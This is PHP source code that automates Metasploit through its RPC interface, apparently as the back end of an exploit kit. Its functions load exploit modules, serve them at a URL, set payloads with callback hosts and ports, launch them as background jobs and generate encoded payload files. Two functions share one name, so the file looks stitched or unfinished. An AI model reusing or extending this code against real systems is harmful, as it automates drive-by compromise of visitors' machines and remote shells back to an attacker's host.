function use_exploit($msgrpc_ip, $exploit_domain, $exploit_port, $msf_exploit_full_path, $msf_target, $msf_payload_full_path, $msf_cmd_option, $msf_uripath, $msf_ssl = 0)
{
debug("START Function use_exploit()");
debug("msgrpc_ip: " . $msgrpc_ip);
debug("exploit_domain: " . $exploit_domain);
debug("exploit_port: " . $exploit_port);
debug("msf_exploit_full_path: " . $msf_exploit_full_path);
debug("msf_target: " . $msf_target);
debug("msf_payload_full_path: " . $msf_payload_full_path);
debug("msf_cmd_option: " . $msf_cmd_option);
// WL_DOMAIN
// EXPLOIT_DOMAIN
// MSGRPC_IP
$token = msf_auth($msgrpc_ip);
$client_request = array("core.version", $token);
$server_response = msf_cmd($msgrpc_ip, $client_request);
$client_request = array("console.create", $token);
$server_response = msf_cmd($msgrpc_ip, $client_request);
$console_id_one = $server_response["id"];
$server_response = msf_console($msgrpc_ip, $token, $console_id_one, "use " . $msf_exploit_full_path);
//debug_r("server_response: " . $server_response);
$msf_exploit_name = substr(strrchr($msf_exploit_full_path, "/"), 1);
debug("msf_exploit_name: " . $msf_exploit_name);
$server_response = msf_console($msgrpc_ip, $token, $console_id_one, "set URIPATH /" . $msf_uripath);
//$server_response = msf_console($ek_ip, $token, $console_id_one, "set SRVPORT 80");
$server_response = msf_console($msgrpc_ip, $token, $console_id_one, "set SRVPORT " . $exploit_port);
if ($msf_ssl) {
$server_response = msf_console($msgrpc_ip, $token, $console_id_one, "set SSL true");
} else {
$server_response = msf_console($msgrpc_ip, $token, $console_id_one, "set SSL false");
}
if ($msf_target >= 0) {
$server_response = msf_console($msgrpc_ip, $token, $console_id_one, "set TARGET " . $msf_target);
}
// TODO: maybe remove when going live?
$server_response = msf_console($msgrpc_ip, $token, $console_id_one, "set Retries true");
$server_response = msf_console($msgrpc_ip, $token, $console_id_one, "set PAYLOAD " . $msf_payload_full_path);
$server_response = msf_console($msgrpc_ip, $token, $console_id_one, $msf_cmd_option);
$server_response = msf_console($msgrpc_ip, $token, $console_id_one, "set DisablePayloadHandler true");
//$server_response = msf_console($ek_ip, $token, $console_id_one, "set LHOST " . $cb_ip);
//$server_response = msf_console($ek_ip, $token, $console_id_one, "set LPORT " . $cb_port);
// // // $server_response = msf_console($ek_ip, $token, $console_id_one, "set InitialAutoRunScript migrate -f");
//$server_response = msf_console($ek_ip, $token, $console_id_one, "set InitialAutoRunScript run post/windows/manage/migrate");
$server_response = msf_console($msgrpc_ip, $token, $console_id_one, "exploit -j");
// use -j not -j -z
$server_response = msf_console($msgrpc_ip, $token, $console_id_one, "show options");
if ($msf_ssl) {
#$msf_url = 'https://' . $exploit_domain . '/' . $msf_exploit_name;
$msf_url = 'http://' . $exploit_domain . '/' . $msf_uripath;
} else {
#$msf_url = 'http://' . $exploit_domain . '/' . $msf_exploit_name;
$msf_url = 'http://' . $exploit_domain . '/' . $msf_uripath;
}
debug("msf_url: " . $msf_url);
debug("END Function use_exploit()");
return $msf_url;
}
function use_payload($ek_ip, $ek_un, $ek_pw, $msf_payload, $msf_type, $msf_rhost, $msf_rport, $msf_lhost, $msf_lport, $msf_encoder, $file_name)
{
$token = msf_auth($ek_ip, $ek_un, $ek_pw);
$client_request = array("core.version", $token);
$server_response = msf_cmd($ek_ip, $client_request);
$client_request = array("console.create", $token);
$server_response = msf_cmd($ek_ip, $client_request);
$console_id_one = $server_response["id"];
$server_response = msf_console($ek_ip, $token, $console_id_one, "use " . $msf_payload);
//debug("msf_payload: " . $msf_payload . "</BR>");
$server_response = msf_console($ek_ip, $token, $console_id_one, "set LHOST " . $msf_lhost);
$server_response = msf_console($ek_ip, $token, $console_id_one, "set RHOST " . $msf_rhost);
$server_response = msf_console($ek_ip, $token, $console_id_one, "set RPORT " . $msf_rport);
$server_response = msf_console($ek_ip, $token, $console_id_one, "set LPORT " . $msf_lport);
$server_response = msf_console($ek_ip, $token, $console_id_one, "set EXITFUNC thread");
if ($msf_type == "raw") {
$tmp_file = "/tmp/" . (string) time();
$generated_payload = "generate -t " . $msf_type . " -f " . $tmp_file . " -b \\x00 -e " . $msf_encoder;
//print $generated_payload;
$server_response = msf_console($ek_ip, $token, $console_id_one, $generated_payload);
sleep(1);
$server_response = msf_console($ek_ip, $token, $console_id_one, "cat " . $tmp_file . " | base64 -w 0 > " . $file_name);
sleep(1);
$server_response = msf_console($ek_ip, $token, $console_id_one, "rm " . $tmp_file);
} else {
$server_response = msf_console($ek_ip, $token, $console_id_one, "generate -t " . $msf_type . " -f " . $file_name . " -b \\x00 -e " . $msf_encoder);
}
$fs = filesize($file_name);
if ($fs == 0) {
return false;
} else {
return true;
}
//return $server_response;
}
function use_exploit($ek_ip, $cb_ip, $msf_exploit_full_path, $msf_payload_full_path, $msf_target = -1)
{
debug("START Function use_exploit()</br>");
$token = msf_auth($ek_ip);
$client_request = array("core.version", $token);
$server_response = msf_cmd($ek_ip, $client_request);
$client_request = array("console.create", $token);
$server_response = msf_cmd($ek_ip, $client_request);
$console_id_one = $server_response["id"];
$server_response = msf_console($ek_ip, $token, $console_id_one, "use " . $msf_exploit_full_path);
$msf_exploit_name = substr(strrchr($msf_exploit_full_path, "/"), 1);
debug("msf_exploit_name: " . $msf_exploit_name . "</BR>");
$server_response = msf_console($ek_ip, $token, $console_id_one, "set URIPATH /" . $msf_exploit_name);
$server_response = msf_console($ek_ip, $token, $console_id_one, "set SRVPORT 80");
if ($msf_target >= 0) {
$server_response = msf_console($ek_ip, $token, $console_id_one, "set TARGET " . $msf_target);
}
$server_response = msf_console($ek_ip, $token, $console_id_one, "set PAYLOAD " . $msf_payload_full_path);
$server_response = msf_console($ek_ip, $token, $console_id_one, "set LHOST " . $cb_ip);
$server_response = msf_console($ek_ip, $token, $console_id_one, "set LPORT 53");
$server_response = msf_console($ek_ip, $token, $console_id_one, "set DisablePayloadHandler true");
$server_response = msf_console($ek_ip, $token, $console_id_one, "exploit -j");
$server_response = msf_console($ek_ip, $token, $console_id_one, "show options");
$msf_url = 'http://' . $ek_ip . '/' . $msf_exploit_name;
debug("END Function use_exploit()</br>");
return $msf_url;
}